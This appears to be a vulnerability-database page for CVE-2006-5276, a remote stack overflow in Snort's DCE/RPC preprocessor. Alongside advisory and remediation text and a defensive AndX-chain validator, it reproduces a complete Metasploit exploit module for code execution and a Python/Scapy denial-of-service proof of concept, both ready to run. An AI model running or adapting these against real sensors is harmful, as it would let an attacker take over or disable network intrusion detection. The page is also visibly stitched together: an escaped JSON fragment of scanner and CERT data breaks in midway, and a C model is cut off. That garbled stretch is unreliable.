# Snort DCE/RPC preprocessor buffer overflow

SAINT exploit SAINT:AA4F55AACCFB3D420B4972A4E9BE4880, added 07/09/2007 (<http://download.saintcorporation.com/cgi-bin/exploit_info/snort_dcerpc>)
CVE: [CVE-2006-5276](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276)
BID: [22616](http://www.securityfocus.com/bid/22616)
OSVDB: [32094](http://www.osvdb.org/32094)
CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Related identifiers: EDB-ID 3362, 3391, 3609, 18723; CERT VU#196240; GLSA-200703-01; FreeBSD VuXML afdf500f-c1f6-11db-95c5-000c6ec775d9; Metasploit exploit/multi/ids/snort_dce_rpc; CANVAS snortrpc; SSV:6573

### Background

[Snort](http://www.snort.org) is an open-source intrusion detection system. It includes a DCE/RPC preprocessor, which reassembles DCE/RPC traffic carried over SMB before it is passed to the intrusion detection engine. The preprocessor is enabled by default.

### Problem

A stack-based buffer overflow in the DCE/RPC preprocessor allows remote attackers to execute arbitrary code on the sensor by chaining multiple **WriteAndX** requests in the same TCP segment. The preprocessor does not check that the segment belongs to an established TCP session, so a single crafted SMB packet seen on the monitored network is enough: the attacker needs no session with any host, and the packet's destination does not have to run an SMB service.

Affected: Snort 2.6.1, 2.6.1.1 and 2.6.1.2, Snort 2.7 beta 1, and Sourcefire Intrusion Sensor 4.1, 4.5 and 4.6 when used with SEUs prior to SEU 64. Installations with the DCE/RPC preprocessor disabled are not affected.

### Resolution

[Upgrade](http://www.snort.org/dl/) to Snort 2.6.1.3 or higher (2.7 beta 2 or later on the 2.7 branch). As a stop-gap, disable the DCE/RPC preprocessor by removing its directives from snort.conf and restarting Snort; this removes the vulnerable code path, but also removes detection of attacks carried in DCE/RPC traffic.

### References

<http://www.us-cert.gov/cas/techalerts/TA07-050A.html>
<http://www.snort.org/docs/advisory-2007-02-19.html>

### Limitations

Exploit works on Snort 2.6.1.1 on Windows and Snort 2.6.1.2 on Red Hat 8, and requires port 445/TCP to be open on the target. (The Metasploit and CANVAS modules in the related entries below differ: they inject a single packet toward port 139 and do not need a real SMB listener at the destination.)

### Platforms

- Windows 2000
- Windows XP SP0 / Windows XP SP1
- Windows XP SP2 / Windows XP
- Linux
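The shape described under Problem (several AndX commands chained inside one segment, ending in two WriteAndX requests of which the second claims far more data than it carries) is easiest to reason about once the AndX chain is walked explicitly. The following Python is an added example written for this page, not code from SAINT, Snort or the exploit authors: it builds two constructed segments with the same WriteAndX field layout the published proof of concept uses (WordCount 14, a 72-byte DCE/RPC bind PDU, DataLength 511 in the second request) and applies the bounds checks a reassembler has to make before it copies request data. The command-code constants are the standard SMB1 ones; the FID 0x4000, the bind PDU filler and all function and field names are this example's own assumptions.

```python
import struct

# SMB1 constants (standard values); the AndX set is the commands that carry an AndX header
NBSS_HDR_LEN = 4          # NetBIOS Session Service header: type byte + 3-byte length
SMB_HDR_LEN = 32          # fixed SMB1 header beginning with \xffSMB
SMB_COM_WRITE_ANDX = 0x2F
SMB_COM_NONE = 0xFF       # AndXCommand value meaning "end of chain"
ANDX_COMMANDS = {0x24, 0x2E, 0x2F, 0x73, 0x74, 0x75, 0xA2}


def check_write_andx(smb, off, wct, block_end):
    """Bounds checks for one SMB_COM_WRITE_ANDX block whose WordCount byte is at smb[off].
    block_end is where the block's data area (ByteCount bytes) actually stops."""
    if wct not in (12, 14):
        return [f"WriteAndX at {off}: WordCount {wct} is neither 12 nor 14"]
    # words after the AndX header: FID, Offset, Timeout, WriteMode, Remaining,
    # DataLengthHigh, DataLength, DataOffset (OffsetHigh follows when wct == 14)
    _fid, _ofs, _tmo, _mode, _rem, dl_high, dl_low, data_off = struct.unpack_from("<HIIHHHHH", smb, off + 5)
    data_len = (dl_high << 16) | dl_low
    data_start = off + 1 + 2 * wct + 2          # first byte after ByteCount
    if data_off < data_start or data_off + data_len > block_end:
        return [f"WriteAndX at {off}: DataOffset {data_off} + DataLength {data_len} "
                f"exceeds the {block_end - data_start} bytes present after ByteCount"]
    return []


def walk_andx_chain(segment, max_links=16):
    """Follow the AndX chain in one TCP segment payload (NBSS header + SMB message).
    Returns (command codes in chain order, findings). Every offset is validated
    against the bytes actually present before it is dereferenced."""
    if len(segment) < NBSS_HDR_LEN + SMB_HDR_LEN or segment[NBSS_HDR_LEN:NBSS_HDR_LEN + 4] != b"\xffSMB":
        return [], ["not an SMB message"]
    smb = segment[NBSS_HDR_LEN:]
    cmd, off, seen, chain, findings = smb[4], SMB_HDR_LEN, set(), [], []
    while len(chain) < max_links:
        if off in seen or off >= len(smb):
            findings.append(f"AndXOffset {off} loops or leaves the message")
            break
        seen.add(off)
        wct = smb[off]
        bcc_at = off + 1 + 2 * wct                  # ByteCount follows the parameter words
        if bcc_at + 2 > len(smb):
            findings.append(f"command 0x{cmd:02x} at {off}: parameter words run past the message")
            break
        bcc = struct.unpack_from("<H", smb, bcc_at)[0]
        block_end = bcc_at + 2 + bcc
        if block_end > len(smb):
            findings.append(f"command 0x{cmd:02x} at {off}: ByteCount {bcc} runs past the message")
            break
        chain.append(cmd)
        if cmd == SMB_COM_WRITE_ANDX:
            findings += check_write_andx(smb, off, wct, block_end)
        if cmd not in ANDX_COMMANDS or wct < 2:
            break
        next_cmd, next_off = smb[off + 1], struct.unpack_from("<H", smb, off + 3)[0]
        if next_cmd == SMB_COM_NONE:
            break
        if next_off < block_end:                    # the next block must start after this one
            findings.append(f"AndXOffset {next_off} points back into the block at {off}")
            break
        cmd, off = next_cmd, next_off
    writes = chain.count(SMB_COM_WRITE_ANDX)
    if writes > 1:
        findings.append(f"{writes} WriteAndX requests chained in one segment")
    return chain, findings


# --- constructed sample segments (same field layout as the published proof of concept) ---

def smb_header(command):
    return b"\xffSMB" + bytes([command]) + b"\x00" * 27


def write_andx(next_cmd, next_off, data_off, data, data_len=None):
    """One WriteAndX block (WordCount 14); data_len lets the caller lie about the length."""
    words = struct.pack("<BBBHHIIHHHHHI",
                        14, next_cmd, 0, next_off,      # WordCount, AndXCommand, AndXReserved, AndXOffset
                        0x4000, 0, 0xFFFFFFFF,          # FID (assumed), Offset, Timeout
                        0x0080, len(data), 0,           # WriteMode, Remaining, DataLengthHigh
                        len(data) if data_len is None else data_len, data_off, 0)  # DataLength, DataOffset, OffsetHigh
    return words + struct.pack("<H", len(data) + 1) + b"\xee" + data   # ByteCount, pad byte, data


def nbss(body):
    return b"\x00" + len(body).to_bytes(3, "big") + body


# constructed 72-byte DCE/RPC bind PDU: 16-byte header (v5.0, ptype 11 = bind) plus filler
BIND_PDU = struct.pack("<BBBBIHHI", 5, 0, 11, 3, 0x10, 72, 0, 1) + b"\x00" * 56
WRITE_BLOCK_LEN = 29 + 2 + 1 + len(BIND_PDU)   # words, ByteCount, pad, data = 104 bytes


def exploit_shaped_segment():
    """Two chained WriteAndX requests; the second claims DataLength 511 for 72 real bytes."""
    off1, off2 = SMB_HDR_LEN, SMB_HDR_LEN + WRITE_BLOCK_LEN
    first = write_andx(SMB_COM_WRITE_ANDX, off2, off1 + 32, BIND_PDU)
    second = write_andx(SMB_COM_NONE, 0xDEDE, off2 + 32, BIND_PDU, data_len=511)
    return nbss(smb_header(SMB_COM_WRITE_ANDX) + first + second)


def benign_segment():
    """A single, honestly sized WriteAndX carrying the same bind PDU."""
    return nbss(smb_header(SMB_COM_WRITE_ANDX) + write_andx(SMB_COM_NONE, 0, SMB_HDR_LEN + 32, BIND_PDU))


if __name__ == "__main__":
    for name, seg in (("exploit-shaped", exploit_shaped_segment()), ("benign", benign_segment())):
        chain, findings = walk_andx_chain(seg)
        print(name, [hex(c) for c in chain], findings)
```

The walker refuses to follow any AndXOffset that does not advance past the current block and checks DataOffset + DataLength against the bytes the block really contains, which is the comparison a reassembler must make before copying into a fixed buffer; on the exploit-shaped segment it reports both the oversized second request and the fact that two WriteAndX requests share one segment, and on the benign segment it reports nothing.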
## Related entries

### CVE-2006-5276 (NVD, published 2007-02-20)

Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. All affected Sourcefire Intrusion Sensor products are only vulnerable if they are used with SEUs prior to SEU 64. Upgrade to the latest version of Snort (2.6.1.3 or later), available from the Snort Web site.

CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C), CWE: NVD-CWE-Other. Affected CPEs: snort 2.6.1, 2.6.1.1, 2.6.1.2, 2.7_beta1; sourcefire intrusion_sensor 4.1, 4.5, 4.6 (standard and Crossbeam builds). <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5276>

### Immunity CANVAS: SNORTRPC

Name: snortrpc. Vendor: SourceFire. Date public: 19-02-2007. Repeatability: single shot. Exploit pack: [CANVAS](http://www.immunityinc.com/products-canvas.shtml), <http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/snortrpc>. Notes from the module: this version of the exploit needs to connect to port 139; it does not need to be an actual NetBIOS target, something like a netcat listener will work fine. Reference: <http://xforce.iss.net/xforce/xfdb/31275>

### Metasploit: Snort 2 DCE/RPC preprocessor Buffer Overflow (Packet Storm 111677, 2012-04-10)

Module source from <https://packetstormsecurity.com/files/download/111677/snort_dce_rpc.rb.txt>, re-indented. Note that the module's `requestsize` value is written into the DataOffset/DataLength position of Write AndX Request #2 so that the copy overruns by `Offset` bytes before the return address is reached.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Capture
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Snort 2 DCE/RPC preprocessor Buffer Overflow',
      'Description'    => %q{
        This module allows remote attackers to execute arbitrary code by exploiting the
        Snort service via crafted SMB traffic. The vulnerability is due to a boundary
        error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,
        which may result in a stack-based buffer overflow with a specially crafted packet
        sent on a network that is monitored by Snort.

        Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.

        Any host on the Snort network may be used as the remote host. The remote host does not
        need to be running the SMB service for the exploit to be successful.
      },
      'Author'         =>
        [
          'Neel Mehta',                                   # Original discovery (IBM X-Force)
          'Carsten Maartmann-Moe <carsten[at]carmaa.com>' # Metasploit
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'win',
      'References'     =>
        [
          [ 'OSVDB', '67988' ],
          [ 'CVE', '2006-5276' ],
          [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 390,
          'BadChars'    => "\x00",
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [
            'Windows Universal',
            {
              'Ret'    => 0x00407c01, # JMP ESP snort.exe
              'Offset' => 289         # The number of bytes before overwrite
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Feb 19 2007',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(139),
        OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),
        OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])
      ], self.class)

    deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
  end

  def exploit
    open_pcap

    shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)

    p = buildpacket(shost, rhost, rport.to_i)

    print_status("Sending crafted SMB packet from #{shost} to #{rhost}:#{rport}...")

    capture_sendto(p, rhost)

    handler
  end

  def buildpacket(shost, rhost, rport)
    p = PacketFu::TCPPacket.new
    p.ip_saddr = shost
    p.ip_daddr = rhost
    p.tcp_dport = rport
    p.tcp_flags.psh = 1
    p.tcp_flags.ack = 1

    # SMB packet borrowed from http://exploit-db.com/exploits/3362

    # NetBIOS Session Service, value is the number of bytes in the TCP segment,
    # must be greater than the total size of the payload. Statically set.
    header = "\x00\x00\xde\xad"

    # SMB Header
    header << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
    header << "\x00\x08\x30\x00"

    # Tree Connect AndX Request
    header << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
    header << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
    header << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
    header << "\x3f\x3f\x3f\x3f\x3f\x00"

    # NT Create AndX Request
    header << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
    header << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    header << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
    header << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
    header << "\x63\x00\x00\x00"

    # Write AndX Request #1
    header << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    header << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
    header << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
    header << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
    header << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
    header << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
    header << "\x2b\x10\x48\x60\x02\x00\x00\x00"

    # Write AndX Request #2
    header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    header << "\x00\x48\x00\x00\x00\xff\x01"

    tail = "\x00\x00\x00\x00\x49\x00\xee"

    # Return address
    eip = [target['Ret']].pack('V')

    # Sploit
    sploit = make_nops(10)
    sploit << payload.encoded

    # Padding (to pass size check)
    sploit << make_nops(1)

    # The size to be included in Write AndX Request #2, including sploit payload
    requestsize = [(sploit.size() + target['Offset'])].pack('v')

    # Assemble the parts into one package
    p.payload = header << requestsize << tail << eip << sploit
    p.recalc

    p
  end
end
```

### snort-py.txt: Snort DCE/RPC Preprocessor Buffer Overflow (DoS) (Packet Storm 54632, 2007-02-24)

Proof-of-concept by Trirat Puttaraksa from <https://packetstormsecurity.com/files/download/54632/snort-py.txt>. It injects the same Tree Connect / NT Create / Write AndX / Write AndX chain as a single PSH/ACK segment toward port 139 of any address on the monitored network and crashes the sensor; the second Write AndX carries a DataLength of 0x01ff (511) and a DataOffset of 0x0130 for a 72-byte DCE/RPC bind. The script is shown here updated to Python 3 and the current `scapy.all` import; the byte payload is unchanged.

```python
#!/usr/bin/env python3
#
# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)
#
# Author: Trirat Puttaraksa <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit just crashes Snort 2.6.1 on Fedora Core 4. However, Code Execution
# may be possible, but I have no time to make it :(
# I will post the information about this vulnerability in my blog soon
#
# Note: this exploit uses Scapy (http://www.secdev.org/projects/scapy/)
# to inject the packet, so you have to install Scapy before using it.
#
#######################################################

import sys
from scapy.all import IP, TCP, conf, send

conf.verb = 0

# NetBIOS Session Service
payload = b"\x00\x00\x01\xa6"

# SMB Header
payload += b"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
payload += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
payload += b"\x00\x08\x30\x00"

# Tree Connect AndX Request
payload += b"\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
payload += b"\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
payload += b"\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
payload += b"\x3f\x3f\x3f\x3f\x3f\x00"

# NT Create AndX Request
payload += b"\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
payload += b"\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += b"\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
payload += b"\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
payload += b"\x63\x00\x00\x00"

# Write AndX Request #1 (DataLength 0x48, DataOffset 0xb6) followed by a DCE/RPC bind
payload += b"\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
payload += b"\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"

payload += b"\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
payload += b"\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
payload += b"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
payload += b"\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
payload += b"\x2b\x10\x48\x60\x02\x00\x00\x00"

# Write AndX Request #2 (DataLength 0x01ff, DataOffset 0x0130) followed by a DCE/RPC bind
payload += b"\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
payload += b"\x00\x48\x00\x00\x00\xff\x01\x30\x01\x00\x00\x00\x00\x49\x00\xee"

payload += b"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
payload += b"\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
payload += b"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
payload += b"\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
payload += b"\x2b\x10\x48\x60\x02\x00\x00\x00"

if len(sys.argv) != 2:
    print("Usage snort_dos_dcerpc.py <fake destination ip>")
    sys.exit(1)

target = sys.argv[1]

# a single PSH/ACK segment is enough: the preprocessor does not require an established session
p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
send(p)
```

### OSVDB 32094: Snort DCE/RPC Pre-Processor Packet Reassembly Remote Overflow (2007-02-17)

Vulnerability description: A remote overflow exists in Snort. The DCE/RPC Pre-Processor fails to check if traffic is part of a valid TCP session, and multiple "Write AndX" requests can be chained in the same TCP segment resulting in a stack overflow. With a specially crafted SMB packet, an attacker can cause arbitrary code execution resulting in a loss of integrity.

Technical description: Users who have disabled the DCE/RPC preprocessor are not vulnerable. However, the DCE/RPC preprocessor is enabled by default.

Solution: Upgrade to version 2.6.1.3 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic.

References:

- Vendor advisory: <http://www.snort.org/docs/advisory-2007-02-19.html>
- Nortel: <http://www116.nortelnetworks.com/pub/repository/CLARIFY/DOCUMENT/2007/08/021923-01.pdf>, <http://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173>
- US-CERT TA07-050A; CERT VU#196240; Security Tracker 1017670; Bugtraq ID 22616; ISS X-Force 31275; FrSIRT ADV-2007-0668, ADV-2007-0656; Nessus plugin 24686
- Secunia 24190, 24235, 24239, 24240, 24272, 26746
- <http://www.iss.net/threats/257.html>, <https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00122.html>, <http://www.gentoo.org/security/en/glsa/glsa-200703-01.xml>, <http://isc.sans.org/diary.html?storyid=2280>
- News: <http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9011574>
- Exploit: <http://www.milw0rm.com/exploits/3362>

### Distribution advisories and scanner checks

- FreeBSD ports (VuXML afdf500f-c1f6-11db-95c5-000c6ec775d9, OpenVAS 58055): the `snort` port is vulnerable from 2.6.1 up to but not including 2.6.1.3. <http://www.vuxml.org/freebsd/afdf500f-c1f6-11db-95c5-000c6ec775d9.html>
- Gentoo GLSA 200703-01 (OpenVAS 58060, bug 167730): `net-analyzer/snort` below 2.6.1.3 is vulnerable; fix with `emerge --sync` followed by `emerge --ask --oneshot --verbose '>=net-analyzer/snort-2.6.1.3'`.
- Fedora 7 FEDORA-2007-2060 (OpenVAS 861388): update to the `snort-2.7.0.1-3.fc7` packages (snort, snort-plain+flexresp, snort-mysql, snort-mysql+flexresp, snort-postgresql, snort-postgresql+flexresp, snort-snmp, snort-snmp+flexresp, snort-bloat, snort-debuginfo). <https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00122.html>
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-snmp\", rpm:\"snort-snmp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort\", rpm:\"snort~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-bloat\", rpm:\"snort-bloat~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-postgresql+flexresp\", rpm:\"snort-postgresql+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-mysql+flexresp\", rpm:\"snort-mysql+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-postgresql\", rpm:\"snort-postgresql~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-plain+flexresp\", rpm:\"snort-plain+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-debuginfo\", rpm:\"snort-debuginfo~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-mysql\", rpm:\"snort-mysql~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:51", "bulletinFamily": "info", "cvelist": ["CVE-2006-5276"], "description": "### Overview \n\nA vulnerability in the Sourcefire Snort DCE/RPC preprocessor may allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nSourcefire Snort is a widely-deployed, open-source 
network intrusion detection system (IDS). Snort and its components are used in other IDS products, notably Sourcefire, and Snort is included with a number of operating system distributions. \n \nSnort preprocessors are modular plugins that extend functionality by operating on packets before the detection engine is run. The [DCE/RPC](<http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html>) preprocessor reassembles fragmented SMB and DCE/RPC packets so that Snort rules operate on a complete packet. The preprocessor does not properly reassemble SMB Write AndX commands, creating a stack buffer overflow vulnerability.\n\nThe DCE/RPC preprocessor is enabled by default and dynamically detects SMB traffic. An attacker does not have to complete a full TCP connection to exploit this vulnerability. According to [ISS](<http://www.iss.net/threats/257.html>): \n_This vulnerability is in a dynamic-preprocessor enabled in the default configuration, and the configuration for this preprocessor allows for auto-recognition of SMB traffic to perform reassembly on. No checks are performed to see if the traffic is part of a valid TCP session, and multiple Write AndX requests can be chained in the same TCP segment. As a result, an attacker can exploit this overflow with a single TCP PDU sent across a network monitored by Snort or Sourcefire._ \nNote that this issue affects the following systems:\n\n * Snort 2.6.1, 2.6.1.1, and 2.6.1.2\n * Snort 2.7.0 beta 1\n * Sourcefire Intrusion Sensors versions 4.1.x, 4.5.x, and 4.6.x with SEUs prior to SEU 64\n * Sourcefire Intrusion Sensor Software for Crossbeam versions 4.1.x, 4.5.x and 4.6.x with SEUs prior to SEU 64\nExploit code for this vulnerability is publicly available. \n \n \n \nThis vulnerability occurred as a result of violating rule [ARR33-C](<https://www.securecoding.cert.org/confluence/display/seccode/ARR33-C.+Guarantee+that+copies+are+made+into+storage+of+sufficient+size>) of the CERT Secure Coding Standard. 
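The defect class the note describes, as an added illustration that is not Snort's preprocessor code and not part of the CERT, SAINT or scanner text above: a chain of SMB1 Write AndX requests inside one segment, where each request on its own is small enough to fit the reassembly buffer but the chain as a whole is not. The wire layout (AndXCommand, AndXOffset and DataOffset relative to the SMB header; WordCount 12 for Write AndX) is the real SMB1 format; the 64-byte buffer, the per-request versus cumulative policies, and the builder that constructs the sample segment are assumptions made for the model. The segment is parsed with no TCP session state at all, matching the note's point that a single PDU on a monitored link is enough.

```c
/* Model of chained SMB1 Write AndX handling. Illustration only: not Snort's code.
 * AndXOffset and DataOffset are relative to the start of the SMB header (SMB1). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define NBSS_LEN            4
#define SMB_HDR_LEN         32
#define SMB_COM_WRITE_ANDX  0x2F
#define SMB_COM_NONE        0xFF
#define WX_FIXED            27      /* WordCount + 12 parameter words + ByteCount */
#define REASM_BUF           64      /* assumed reassembly buffer size for this model */
#define MAX_CHAIN           8

typedef struct { size_t off; size_t len; } wx_t;  /* where a request's data lies in the segment */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void     wr16(uint8_t *p, uint16_t v) { p[0] = v & 0xFF; p[1] = (uint8_t)(v >> 8); }

/* Constructed input: one NetBIOS session message whose SMB body chains n Write AndX
 * requests, request i carrying lens[i] bytes of 'A' + i. Returns total length, 0 on error. */
size_t build_writeandx_chain(uint8_t *out, size_t cap, const size_t *lens, int n)
{
    size_t pos = NBSS_LEN + SMB_HDR_LEN;
    if (n < 1 || cap < pos) return 0;
    memset(out, 0, cap);
    memcpy(out + NBSS_LEN, "\xFFSMB", 4);
    out[NBSS_LEN + 4] = SMB_COM_WRITE_ANDX;              /* header Command = first block */
    for (int i = 0; i < n; i++) {
        size_t blk = WX_FIXED + lens[i];
        if (pos + blk > cap || lens[i] > 0xFFFF) return 0;
        uint8_t *b = out + pos;
        int last = (i + 1 == n);
        b[0] = 12;                                       /* WordCount */
        b[1] = last ? SMB_COM_NONE : SMB_COM_WRITE_ANDX; /* AndXCommand */
        wr16(b + 3,  last ? 0 : (uint16_t)(pos + blk - NBSS_LEN)); /* AndXOffset -> next block */
        wr16(b + 21, (uint16_t)lens[i]);                 /* DataLength */
        wr16(b + 23, (uint16_t)(pos + WX_FIXED - NBSS_LEN)); /* DataOffset */
        wr16(b + 25, (uint16_t)lens[i]);                 /* ByteCount */
        memset(b + WX_FIXED, 'A' + i, lens[i]);
        pos += blk;
    }
    out[1] = (uint8_t)((pos - NBSS_LEN) >> 16);          /* NBSS length, 24-bit big-endian */
    out[2] = (uint8_t)((pos - NBSS_LEN) >> 8);
    out[3] = (uint8_t)(pos - NBSS_LEN);
    return pos;
}

/* Walk the AndX chain of one segment and record each request's data location.
 * Returns the number of requests, or -1 for a malformed, truncated or looping chain. */
int parse_writeandx_chain(const uint8_t *seg, size_t seg_len, wx_t *out, int max)
{
    size_t pos = NBSS_LEN + SMB_HDR_LEN;
    int n = 0;
    if (seg_len < pos || memcmp(seg + NBSS_LEN, "\xFFSMB", 4) != 0) return -1;
    if (seg[NBSS_LEN + 4] != SMB_COM_WRITE_ANDX) return -1;
    size_t smb_len = seg_len - NBSS_LEN;
    for (;;) {
        if (n == max || pos + WX_FIXED > seg_len || seg[pos] != 12) return -1;
        uint8_t andx_cmd = seg[pos + 1];
        size_t andx_off = rd16(seg + pos + 3);
        size_t data_len = rd16(seg + pos + 21);
        size_t data_off = rd16(seg + pos + 23);
        if (data_off + data_len > smb_len) return -1;    /* data must lie inside this segment */
        out[n].off = NBSS_LEN + data_off;
        out[n].len = data_len;
        n++;
        if (andx_cmd == SMB_COM_NONE) return n;
        if (andx_cmd != SMB_COM_WRITE_ANDX) return -1;   /* model handles Write AndX chains only */
        if (NBSS_LEN + andx_off <= pos) return -1;       /* chain must move forward: no loops */
        pos = NBSS_LEN + andx_off;
    }
}

/* Defective policy: each request is checked against the buffer on its own, so a chain
 * of individually small writes is accepted even when their sum does not fit. */
int accepted_per_request(const wx_t *w, int n, size_t bufsz)
{
    for (int i = 0; i < n; i++) if (w[i].len > bufsz) return 0;
    return 1;
}

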